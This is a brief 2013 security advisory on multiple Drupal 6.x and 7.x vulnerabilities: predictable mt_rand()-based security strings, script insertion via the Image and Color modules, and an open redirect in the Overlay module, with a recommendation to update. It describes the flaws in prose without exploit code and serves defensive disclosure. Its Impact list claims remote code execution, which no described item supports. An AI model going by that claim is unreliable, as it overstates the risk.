Drupal Multiple Vulnerabilities
Last Update Date:
22 Nov 2013 10:30
Release Date:
22 Nov 2013
3835
Views
RISK: Medium Risk
TYPE: Servers - Web Servers
Multiple vulnerabilities have been identified in Drupal, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct brute force, spoofing, and cross-site scripting attacks.
- The application generates security related strings using the cryptographically weak mt_rand() function as an entropy source, which can be exploited to predict the values of the generated strings.
This weakness is reported in 6.x versions prior to 6.29 and 7.x versions prior to 7.24. - Certain unspecified input related to the Image module is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site if malicious data is viewed.
Successful exploitation of this vulnerability requires "administer taxonomy" permissions. - Certain unspecified input related to the Color module is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Successful exploitation of this vulnerability requires the victim to use old versions of browsers such as Internet Explorer and Opera. - Certain input related to the Overlay module is not properly verified before being used to redirect users. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.
Successful exploitation of this weakness requires that the victim has the "Access the administrative overlay" permission.
The weakness #4 and vulnerabilities #2 and #3 are reported in 7.x versions prior to 7.24.
Impact
- Cross-Site Scripting
- Remote Code Execution
- Spoofing
System / Technologies affected
- Drupal 6.x
- Drupal 7.x
Solutions
Before installation of the software, please visit the software manufacturer web-site for more details.
- Update to a fixed version.
Vulnerability Identifier
- No CVE information is available
Source
Related Link
Share with